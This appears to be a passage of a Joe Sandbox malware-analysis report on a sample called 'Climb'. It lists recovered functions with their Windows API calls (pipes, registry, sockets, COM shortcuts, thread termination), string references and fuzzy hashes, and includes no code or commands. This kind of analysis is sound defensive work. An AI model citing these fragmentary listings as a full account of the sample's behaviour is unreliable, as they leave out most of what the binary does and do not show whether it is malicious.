MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001180D0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001180F6
SysAllocString.OLEAUT32(00000000), ref: 001180F9
SysAllocString.OLEAUT32(?), ref: 00118117
SysFreeString.OLEAUT32(?), ref: 00118120
StringFromGUID2.OLE32(?,?,00000028), ref: 00118145
SysAllocString.OLEAUT32(?), ref: 00118153

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 53d9a1e3a2c4877c3b6787eba7825f45c78e419b14882e854d74bd1a83451e6b
Instruction ID: 0e4c82ef99b91038d27c6daa70a26723a58cdd2a0972446953c558942d4413ba
Opcode Fuzzy Hash: 53d9a1e3a2c4877c3b6787eba7825f45c78e419b14882e854d74bd1a83451e6b
Instruction Fuzzy Hash: F4218376600219BFDF14DFA8DC84DFA73ACEB0A360B048525F905DB2A0DB74DC868B60

Function 00118164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001181A9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001181CF
SysAllocString.OLEAUT32(00000000), ref: 001181D2
SysAllocString.OLEAUT32 ref: 001181F3
SysFreeString.OLEAUT32 ref: 001181FC
StringFromGUID2.OLE32(?,?,00000028), ref: 00118216
SysAllocString.OLEAUT32(?), ref: 00118224

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: c93de3a6304fb173b8056b62bdfe935af50e9a9994b907313d2931516fc1e515
Instruction ID: 70452320d45cb8b1339f7a759c982e1b12d58d76059d9c367bf6754a96aa0282
Opcode Fuzzy Hash: c93de3a6304fb173b8056b62bdfe935af50e9a9994b907313d2931516fc1e515
Instruction Fuzzy Hash: 34216076600214BF9F159BA8EC89DAA77ECEB0A360704C125F905CB2A1DB74EC81CB64

Function 00120E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00120E99
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00120ED5

Strings

nul, xrefs: 00120F0E

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: af581ddd434b312ffcf7d58afa532924356f1d178f4ff21f4e99816487487535
Instruction ID: 9392942ef8192580fc48ffd3f06fe80d4a684476572446dd35d48b7675ea8d66
Opcode Fuzzy Hash: af581ddd434b312ffcf7d58afa532924356f1d178f4ff21f4e99816487487535
Instruction Fuzzy Hash: DE218074540319ABDF318F24ED04A9A77A8FF59720F214B19FDA5D72E1D77098A0CB50

Function 00120F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00120F6D
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00120FA8

Strings

nul, xrefs: 00120FE0

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 9b00c0f323bee4d755d9ae983617dc172c102c163bdbde66d5986ec5d029f16d
Instruction ID: a540ca5063a6b10b8b3e104fbf428722aae81175bbbc2c86a62be25d366fdfc6
Opcode Fuzzy Hash: 9b00c0f323bee4d755d9ae983617dc172c102c163bdbde66d5986ec5d029f16d
Instruction Fuzzy Hash: 8521A775640365EBDB309F68AC04A9977E8BF69720F200B19F8A1D32E1D77099A0DB54

Function 00144B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000B7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000B78B1
Part of subcall function 000B7873: GetStockObject.GDI32(00000011), ref: 000B78C5
Part of subcall function 000B7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 000B78CF

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00144BB0
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00144BBD
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00144BC8
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00144BD7
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00144BE3

Strings

Msctls_Progress32, xrefs: 00144B81

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: b5b8d6038d1d4d4da134cff31a5473f33da1f9ec311fa7300f4abf7dfff261a9
Instruction ID: e5468dab0b2ad0392bbf0c1bb37b4ee9c9d07dd48ac0470ca1b04113844e980a
Opcode Fuzzy Hash: b5b8d6038d1d4d4da134cff31a5473f33da1f9ec311fa7300f4abf7dfff261a9
Instruction Fuzzy Hash: 0A1193B1150219BEEF118E64CC85EEB7FADEF08758F014110B608A2060CB72DC619BA4

Function 000EDB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000EDB23: _free.LIBCMT ref: 000EDB4C

_free.LIBCMT ref: 000EDBAD

Part of subcall function 000E2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,000EDB51,00181DC4,00000000,00181DC4,00000000,?,000EDB78,00181DC4,00000007,00181DC4,?,000EDF75,00181DC4), ref: 000E2D4E
Part of subcall function 000E2D38: GetLastError.KERNEL32(00181DC4,?,000EDB51,00181DC4,00000000,00181DC4,00000000,?,000EDB78,00181DC4,00000007,00181DC4,?,000EDF75,00181DC4,00181DC4), ref: 000E2D60

_free.LIBCMT ref: 000EDBB8
_free.LIBCMT ref: 000EDBC3
_free.LIBCMT ref: 000EDC17
_free.LIBCMT ref: 000EDC22
_free.LIBCMT ref: 000EDC2D
_free.LIBCMT ref: 000EDC38

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction ID: d539bbd02b5761f7dc3e775732939bae3dd9122e034ce6429b0664a42b0ab11c
Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction Fuzzy Hash: 96110A72545B88EED620FBB2CC07FCB77DCAF14700F414C1AB299BA263EB65B5148651

Function 0011E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0011E328
LoadStringW.USER32(00000000), ref: 0011E32F
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0011E345
LoadStringW.USER32(00000000), ref: 0011E34C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0011E390

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0011E36D

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: a2df5b7b3548bb406092d2a9f8ee531697b2287959f990faed07426fdc419e54
Instruction ID: 18b49eb581feab17dd91478721f13fa77803a739cac42b2d833790136a5a0a7b
Opcode Fuzzy Hash: a2df5b7b3548bb406092d2a9f8ee531697b2287959f990faed07426fdc419e54
Instruction Fuzzy Hash: 910186F69002087FEB1197E4AD89EE7777CDB09700F4145A5BB0AE6051E7749EC48B71

Function 00121312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00121322
EnterCriticalSection.KERNEL32(00000000,?), ref: 00121334
TerminateThread.KERNEL32(00000000,000001F6), ref: 00121342
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00121350
CloseHandle.KERNEL32(00000000), ref: 0012135F
InterlockedExchange.KERNEL32(?,000001F6), ref: 0012136F
LeaveCriticalSection.KERNEL32(00000000), ref: 00121376

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: ed635ddc60f4b793baa42e455baa93f140d2779f3be13ab0231071bc4f314c8c
Instruction ID: c26de76b121c7ce45ebc0ecb08ab4ec96a5c1e6d11292c21a6f284f157b241d7
Opcode Fuzzy Hash: ed635ddc60f4b793baa42e455baa93f140d2779f3be13ab0231071bc4f314c8c
Instruction Fuzzy Hash: A5F0C936142612BBDB555F54FE49BD6BB3ABF06712F401121F10695CB087B494B1CF90

Function 001326BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0013281D
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0013283E
WSAGetLastError.WSOCK32 ref: 0013284F
htons.WSOCK32(?,?,?,?,?), ref: 00132938
inet_ntoa.WSOCK32(?), ref: 001328E9

Part of subcall function 0011433E: _strlen.LIBCMT ref: 00114348

Part of subcall function 00133C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0012F669), ref: 00133C9D

_strlen.LIBCMT ref: 00132992

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 1707c302969a88cfffd161cf6877baa9cce9121fddb378fc387158b46a76f777
Instruction ID: 0f8c5e8072f2faded0440d9551a87bb871ed238747c57abeaef1c3dd290d81de
Opcode Fuzzy Hash: 1707c302969a88cfffd161cf6877baa9cce9121fddb378fc387158b46a76f777
Instruction Fuzzy Hash: 21B11235604300AFD324EF24C885FAABBE5AF95318F54854CF49A4B2A3DB71ED42CB91

Function 000E0527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 000E042A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E0446
__allrem.LIBCMT ref: 000E045D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E047B
__allrem.LIBCMT ref: 000E0492
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E04B0

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction ID: 99f17304af5bffe2537daddb1be4891876fea1e9b10c28fc48461ceff33552ec
Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction Fuzzy Hash: 8481D8B26017869FE7209E7ACC41BAF73E9AF44724F24412AF511F76C2E7B0DA818754

Function 000E6571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,000D8649,000D8649,?,?,?,000E67C2,00000001,00000001,8BE85006), ref: 000E65CB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,000E67C2,00000001,00000001,8BE85006,?,?,?), ref: 000E6651
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 000E674B
__freea.LIBCMT ref: 000E6758

Part of subcall function 000E3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,000D6A79,?,0000015D,?,?,?,?,000D85B0,000000FF,00000000,?,?), ref: 000E3BC5

__freea.LIBCMT ref: 000E6761
__freea.LIBCMT ref: 000E6786

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 2c2c8c5228b61ff29e7f93b1f7bfb6ac70615047d449fb52d18e07ebeeb62bad
Instruction ID: 8474c2701575e333e366bfbfd7c1f1bc660f834f8b0a0e9109e0d137cdf6fcbf
Opcode Fuzzy Hash: 2c2c8c5228b61ff29e7f93b1f7bfb6ac70615047d449fb52d18e07ebeeb62bad
Instruction Fuzzy Hash: 72512572610286AFDB248F62EC85EBF7BE9EF50794F140229FC55E7140EB36DC4086A0

Function 0013C63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333

Part of subcall function 0013D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013C10E,?,?), ref: 0013D415
Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D451
Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D4C8
Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0013C72A
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0013C785
RegCloseKey.ADVAPI32(00000000), ref: 0013C7CA
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0013C7F9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0013C853
RegCloseKey.ADVAPI32(?), ref: 0013C85F

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: dbe09a31cdd11284581c48b32d40f1d67a25ef48c63c3a9d13777897439fe325
Instruction ID: b91a03ea004af0ebcd393592b8d07ba1e08e9584417119ef87f2fc2d96df48d4
Opcode Fuzzy Hash: dbe09a31cdd11284581c48b32d40f1d67a25ef48c63c3a9d13777897439fe325
Instruction Fuzzy Hash: 2F819D75208341AFD714DF24C885E6ABBE5FF84308F14859CF4995B2A2DB32ED46CB92

Function 0011009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 001100A9
SysAllocString.OLEAUT32(00000000), ref: 00110150
VariantCopy.OLEAUT32(00110354,00000000), ref: 00110179
VariantClear.OLEAUT32(00110354), ref: 0011019D
VariantCopy.OLEAUT32(00110354,00000000), ref: 001101A1
VariantClear.OLEAUT32(?), ref: 001101AB

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: c635ab800096e2933b3f083a7c069d27574fe63f292cb2f6a7a47e1a228667cc
Instruction ID: 3e002b95952a65962a0fa56719d3c6bf29712868038188e3b62f99a1cf6f1ee3
Opcode Fuzzy Hash: c635ab800096e2933b3f083a7c069d27574fe63f292cb2f6a7a47e1a228667cc
Instruction Fuzzy Hash: 3451DB35A00320A7DF19AB649889BA973A5EF5E350F148467F805DF296EBB09CC0C756

Function 00129B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 000B41EA: _wcslen.LIBCMT ref: 000B41EF

Part of subcall function 000B8577: _wcslen.LIBCMT ref: 000B858A

GetOpenFileNameW.COMDLG32(00000058), ref: 00129F2A
_wcslen.LIBCMT ref: 00129F4B
_wcslen.LIBCMT ref: 00129F72
GetSaveFileNameW.COMDLG32(00000058), ref: 00129FCA

Strings

X, xrefs: 00129E57

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 7589a5bb98b03e734cd5c6e7c76e728219a90152c392ce7ed5097d099fea0d4d
Instruction ID: 6949ca2266b69f0256aa098f86ab4836016c9ffdda07589e9c504cbea8288a00
Opcode Fuzzy Hash: 7589a5bb98b03e734cd5c6e7c76e728219a90152c392ce7ed5097d099fea0d4d
Instruction Fuzzy Hash: 83E181316043509FD724DF28D881AAAB7E4FF85314F04896DF8899B3A2DB31ED55CB92

Function 00126ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00126F21
CoInitialize.OLE32(00000000), ref: 0012707E
CoCreateInstance.OLE32(00150CC4,00000000,00000001,00150B34,?), ref: 00127095
CoUninitialize.OLE32 ref: 00127319

Strings

.lnk, xrefs: 00126EFF, 00126F69, 00127025

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 4127e433e759dad572d6b0a6488982f471f8f6f43d661c91b9110ee56731588e
Instruction ID: a740f98b0c0a0901de8b016698da351a59414aef69a5152e18196b3b3fe7efb3
Opcode Fuzzy Hash: 4127e433e759dad572d6b0a6488982f471f8f6f43d661c91b9110ee56731588e
Instruction Fuzzy Hash: BDD15971608211AFC300EF24D881DABB7E8FF99704F40496DF5959B2A2DB71ED49CB92

Function 000B1B00 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 000B249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000B24B0

BeginPaint.USER32(?,?,?), ref: 000B1B35
GetWindowRect.USER32(?,?), ref: 000B1B99
ScreenToClient.USER32(?,?), ref: 000B1BB6
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000B1BC7
EndPaint.USER32(?,?,?,?,?), ref: 000B1C15
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 000F3287

Part of subcall function 000B1C2D: BeginPath.GDI32(00000000), ref: 000B1C4B

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 20efb2451bce2bafeb82d669d7a6a6553179568258335147ada9a5445ada29c0
Instruction ID: 8653f821a4d8f80810bd83620b96d83ed03d38096f8240ef413077d13d50d848
